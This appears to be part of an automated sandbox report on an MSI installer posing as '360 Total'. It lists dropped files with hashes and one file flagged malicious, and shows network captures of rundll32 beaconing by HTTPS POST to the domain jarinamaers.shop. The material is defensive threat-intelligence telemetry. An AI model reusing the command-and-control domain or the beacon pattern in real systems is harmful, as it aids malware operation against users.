SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIB5A8.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIB616.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	401029
Entropy (8bit):	6.5916740449760995
Encrypted:	false
SSDEEP:	6144:QMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1L:QMvZx0FlS68zBQSncb4ZPQTpAjZxqO1L
MD5:	EF76849DEA088BCC0F8E02915E3CA43D
SHA1:	95AD6715CA826A45F518364BB2156F81E0705F18
SHA-256:	46C71ED6563A634729BF0E7BDA08A6C09E2A0CCD840C558DD460FED0FFD1F550
SHA-512:	23A247FCE608306AB643AEB7E72DAF3E3965768DFC6D1BFC06D85DD2403FB8C5CAAEF4B4BF09C536A8D3CF508FD964E94141AEB2E91F70DE26390C94116758C1
Malicious:	false
Preview:	...@IXOS.@.....@`..X.@.....@.....@.....@.....@.....@......&.{B135729E-0574-44D1-B7A1-6E44550F506B}..360 Total..ad.msi.@.....@.....@.....@........&.{805E70A6-23C0-4688-BBAF-6F995BB72730}.....@.....@.....@.....@.......@.....@.....@.......@......360 Total......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}9.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}+.01:\Software\HuMaster LLC\360 Total\Version.@.......@.....@.....@......&.{ADF9F598-7B84-45C9-B1CA-E80968A538BA}7.C:\Users\user\AppData\Local\sharepoint\360total.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".9.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@....

C:\Windows\Installer\MSIB6D3.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	399328
Entropy (8bit):	6.589290025452677
Encrypted:	false
SSDEEP:	6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
MD5:	B9545ED17695A32FACE8C3408A6A3553
SHA1:	F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
SHA-256:	1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
SHA-512:	F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{B135729E-0574-44D1-B7A1-6E44550F506B}

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.161420248830027
Encrypted:	false
SSDEEP:	12:JSbX72Fj4iAGiLIlHVRpBh/7777777777777777777777777vDHFXIOQa704pOlN:JNQI5V1IidF
MD5:	593098A5C51E0886489C5156CC95BEA3
SHA1:	A8C490057A9929DA9FE92E32E7E252CC8225290F
SHA-256:	EC05A88F02E8554CB0A8058C99F7BB1D0116E3848EF74FD0A1687F0BB880A101
SHA-512:	7345187AF19213E70DE99680329B453D3DA99D05CB6844673A66DA6422D7183E5DC2C4A15C709D756C0922AE6E62B6F5B7635452F223FD9D20230613E155B3F9
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5870992721407895
Encrypted:	false
SSDEEP:	48:o8PhUuRc06WXOCFT5GgSqVAEbCycm27S2TB:3hU1UFTwgJewCfH
MD5:	19EE7B28192A55CCA8A0D38BFD426B67
SHA1:	329D409DC223B54F3FB48312AD3D8D4F46E41979
SHA-256:	47FF22EBB129DC79C329DAC1326A08901A1AC3298EE50D73461B85A4EB2DB7F7
SHA-512:	879C8C136F029B3A0DED7B4D4C98ACD6346DEC2BF241580EC6F6E5CFAD8D25DC4773E15BE97DEF5090EC08CC85B97BFF6DB90282209DCC14F17E86013B59290D
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	360001
Entropy (8bit):	5.362995403009861
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauE:zTtbmkExhMJCIpE5
MD5:	DC0671E0270E9D3BFAF1C3E4103F682B
SHA1:	C0530962C022D093DB0A3A89DF07B8CEFF75A5B9
SHA-256:	2113781C312B2336A72FA51F0910DE3639090455914938D772D03A52876B4D73
SHA-512:	0C9F1B2E5CFF0ADDFC9C5BF021EF60F4A5946D62A29ACD3CE441756E9E67199C9808E7556B569924444E096A69006951B75D6DA75268AB3C3452F61B6414303A
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF0283B244C6B5E337.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2706780281553751
Encrypted:	false
SSDEEP:	48:/XcuskPvcFXOTT5OogSqVAEbCycm27S2TB:vctFOTkogJewCfH
MD5:	80E4FBE13DAEDF4F5EBA198F5388AADD
SHA1:	AA7C75DFBC1CC59F4623946CBED91D6B18FB8339
SHA-256:	7811387710332590D006467E592793E4AAF61B4DDBA95A89D2C6AA56AA820C61
SHA-512:	860B466C7E4BB87950C037314BBF445830B9287FB23513C7D62E50F34BBE7E527B87EC832D61B7AF849FF951884625339F294FD97DA83D500EC12C6F953F11C7
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF1AC3CFD0775125FE.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF2073DE2178C8B571.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF3E7EE7BCE9AFA6E3.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.145935377982653
Encrypted:	false
SSDEEP:	24:vOkTxkEsipVkE+kEsipVkEgVAEVkyjCycVgwGpKO2a+1:2kTWS7SqVAEbCycm2a
MD5:	BB3783780B83AE55F51EC9C16A68CFC8
SHA1:	1302A3E98980FA5E0A2888E13AF6C40B2C4C6A25
SHA-256:	27DEDC77DD1C3DA91A1FE017A5E3F8A341AD1201F26965A53BA2F363C159489C
SHA-512:	46AA56FDB95D4003F19F79F122BBFB9053D0B8078A506341CF6F45403F8D01F6425E6844FE97C69ABFC1D6F1692ED949FA5E2C56F3105A655DA0B814111AB61A
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF4AAB101AFF98D1A9.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2706780281553751
Encrypted:	false
SSDEEP:	48:/XcuskPvcFXOTT5OogSqVAEbCycm27S2TB:vctFOTkogJewCfH
MD5:	80E4FBE13DAEDF4F5EBA198F5388AADD
SHA1:	AA7C75DFBC1CC59F4623946CBED91D6B18FB8339
SHA-256:	7811387710332590D006467E592793E4AAF61B4DDBA95A89D2C6AA56AA820C61
SHA-512:	860B466C7E4BB87950C037314BBF445830B9287FB23513C7D62E50F34BBE7E527B87EC832D61B7AF849FF951884625339F294FD97DA83D500EC12C6F953F11C7
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5842B46601C1DFCE.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5870992721407895
Encrypted:	false
SSDEEP:	48:o8PhUuRc06WXOCFT5GgSqVAEbCycm27S2TB:3hU1UFTwgJewCfH
MD5:	19EE7B28192A55CCA8A0D38BFD426B67
SHA1:	329D409DC223B54F3FB48312AD3D8D4F46E41979
SHA-256:	47FF22EBB129DC79C329DAC1326A08901A1AC3298EE50D73461B85A4EB2DB7F7
SHA-512:	879C8C136F029B3A0DED7B4D4C98ACD6346DEC2BF241580EC6F6E5CFAD8D25DC4773E15BE97DEF5090EC08CC85B97BFF6DB90282209DCC14F17E86013B59290D
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF71DE46FB15D5538B.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF73764F6D5903AF00.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF7CA5B0C63524655E.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2706780281553751
Encrypted:	false
SSDEEP:	48:/XcuskPvcFXOTT5OogSqVAEbCycm27S2TB:vctFOTkogJewCfH
MD5:	80E4FBE13DAEDF4F5EBA198F5388AADD
SHA1:	AA7C75DFBC1CC59F4623946CBED91D6B18FB8339
SHA-256:	7811387710332590D006467E592793E4AAF61B4DDBA95A89D2C6AA56AA820C61
SHA-512:	860B466C7E4BB87950C037314BBF445830B9287FB23513C7D62E50F34BBE7E527B87EC832D61B7AF849FF951884625339F294FD97DA83D500EC12C6F953F11C7
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBD93963318F8F7CE.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5870992721407895
Encrypted:	false
SSDEEP:	48:o8PhUuRc06WXOCFT5GgSqVAEbCycm27S2TB:3hU1UFTwgJewCfH
MD5:	19EE7B28192A55CCA8A0D38BFD426B67
SHA1:	329D409DC223B54F3FB48312AD3D8D4F46E41979
SHA-256:	47FF22EBB129DC79C329DAC1326A08901A1AC3298EE50D73461B85A4EB2DB7F7
SHA-512:	879C8C136F029B3A0DED7B4D4C98ACD6346DEC2BF241580EC6F6E5CFAD8D25DC4773E15BE97DEF5090EC08CC85B97BFF6DB90282209DCC14F17E86013B59290D
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE275FC13EEECFB01.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.06805445723953887
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOXvZ1UKkwQa70HLIAVky6lO:2F0i8n0itFzDHFXIOQa70uO
MD5:	DDFE8FC02F97ED0B140BF8FEE34DBC22
SHA1:	23118003F91DD54D01E75F1F22FC417A1F518DB5
SHA-256:	47EBE8FB2E1FF000C6FD50F4ED992F9704EBE2816154A8637FEE2F9FCF0A97AA
SHA-512:	39D6EEB91688280E34E5DA258220236BEB2A87A7B2EC5FF349CCC42A554863F54CA9DF53C0459B688B8408EF7F13D4083AC520E6B541CD4A347B3185BE2AFBB6
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFEA62059097F75191.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {805E70A6-23C0-4688-BBAF-6F995BB72730}, Number of Words: 10, Subject: 360 Total, Author: HuMaster LLC, Name of Creating Application: 360 Total, Template: ;1033, Comments: This installer database contains the logic and data required to install 360 Total., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Entropy (8bit):	7.152500797895932
TrID:	Windows SDK Setup Transform Script (63028/2) 47.91% Microsoft Windows Installer (60509/1) 46.00% Generic OLE2 / Multistream Compound File (8008/1) 6.09%
File name:	ad.msi
File size:	1'619'456 bytes
MD5:	666151c11b7899a0c764abe711d3f9b3
SHA1:	35462114e096f4d307607d713136bfe38479870d
SHA256:	8041a15e27c785f2adcce9e8c643f5cc619b52e50cd36ff043d13c4089ce1cad
SHA512:	835fee905d540f1e3b4d32a0645041c9add6ea488675a8ca99dbe571cfaaef5781bed8c1277dd7942be7d672945d68a1016c2ab5cb645d539e07893d69672adc
SSDEEP:	49152:QZH3YuW8zBQSc0ZnSKmZKumZr7A2BQTBG:+Y90Zn0K/A2OF
TLSH:	CB75D0227386C537C96E01303A29D66B5579FDB74B3140CBA3C82D2E9EB45C16639FA3
File Content Preview:	........................>.......................................................E.......a...............................(...)...*...+...,...-...........A...B...C...D...E...F..................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 22:44:27.549626112 CEST	49723	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:27.549690962 CEST	443	49723	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:27.550072908 CEST	49723	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:27.585788965 CEST	49723	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:27.585803986 CEST	443	49723	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:27.821343899 CEST	443	49723	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:27.821485043 CEST	49723	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:27.886996031 CEST	49723	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:27.887017012 CEST	443	49723	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:27.887360096 CEST	443	49723	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:27.887722015 CEST	49723	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:27.889792919 CEST	49723	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:27.936111927 CEST	443	49723	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:41.950823069 CEST	443	49723	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:41.950954914 CEST	443	49723	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:41.951750994 CEST	49723	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:42.907870054 CEST	49723	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:42.907895088 CEST	443	49723	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:44.043658972 CEST	49724	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:44.043694019 CEST	443	49724	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:44.046277046 CEST	49724	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:44.046477079 CEST	49724	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:44.046497107 CEST	443	49724	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:44.276017904 CEST	443	49724	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:44.276137114 CEST	49724	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:44.276793957 CEST	49724	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:44.276802063 CEST	443	49724	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:44.279637098 CEST	49724	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:44.279644966 CEST	443	49724	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:52.916255951 CEST	443	49724	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:52.916426897 CEST	443	49724	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:52.916493893 CEST	49724	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:52.916522980 CEST	49724	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:52.916837931 CEST	49724	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:52.916858912 CEST	443	49724	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:53.083163023 CEST	49725	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:53.083209038 CEST	443	49725	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:53.083292961 CEST	49725	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:53.083606958 CEST	49725	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:53.083617926 CEST	443	49725	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:53.319941998 CEST	443	49725	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:53.320030928 CEST	49725	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:53.323164940 CEST	49725	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:53.323173046 CEST	443	49725	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:53.325628996 CEST	49725	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:53.325634003 CEST	443	49725	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:58.603646994 CEST	443	49725	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:58.603737116 CEST	49725	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:58.603805065 CEST	443	49725	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:58.603857994 CEST	443	49725	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:58.603885889 CEST	49725	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:58.603920937 CEST	49725	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:58.604172945 CEST	49725	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:58.604207993 CEST	443	49725	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:58.681261063 CEST	49727	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:58.681315899 CEST	443	49727	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:58.681384087 CEST	49727	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:58.681682110 CEST	49727	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:58.681698084 CEST	443	49727	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:58.914426088 CEST	443	49727	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:58.914499044 CEST	49727	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:58.915143013 CEST	49727	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:58.915153980 CEST	443	49727	104.21.46.75	192.168.2.6
Apr 25, 2024 22:44:58.917124987 CEST	49727	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:44:58.917131901 CEST	443	49727	104.21.46.75	192.168.2.6
Apr 25, 2024 22:45:09.140057087 CEST	443	49727	104.21.46.75	192.168.2.6
Apr 25, 2024 22:45:09.140150070 CEST	49727	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:45:09.140170097 CEST	443	49727	104.21.46.75	192.168.2.6
Apr 25, 2024 22:45:09.140232086 CEST	49727	443	192.168.2.6	104.21.46.75
Apr 25, 2024 22:45:09.140280962 CEST	443	49727	104.21.46.75	192.168.2.6
Apr 25, 2024 22:45:09.140412092 CEST	443	49727	104.21.46.75	192.168.2.6
Apr 25, 2024 22:45:09.140465021 CEST	49727	443	192.168.2.6	104.21.46.75

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 22:44:27.381496906 CEST	59873	53	192.168.2.6	1.1.1.1
Apr 25, 2024 22:44:27.538635015 CEST	53	59873	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 25, 2024 22:44:27.381496906 CEST	192.168.2.6	1.1.1.1	0xca8c	Standard query (0)	jarinamaers.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 25, 2024 22:44:27.538635015 CEST	1.1.1.1	192.168.2.6	0xca8c	No error (0)	jarinamaers.shop		104.21.46.75	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:44:27.538635015 CEST	1.1.1.1	192.168.2.6	0xca8c	No error (0)	jarinamaers.shop		172.67.136.103	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jarinamaers.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49723	104.21.46.75	443	2224	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 20:44:27 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop Content-Length: 252 Cache-Control: no-cache
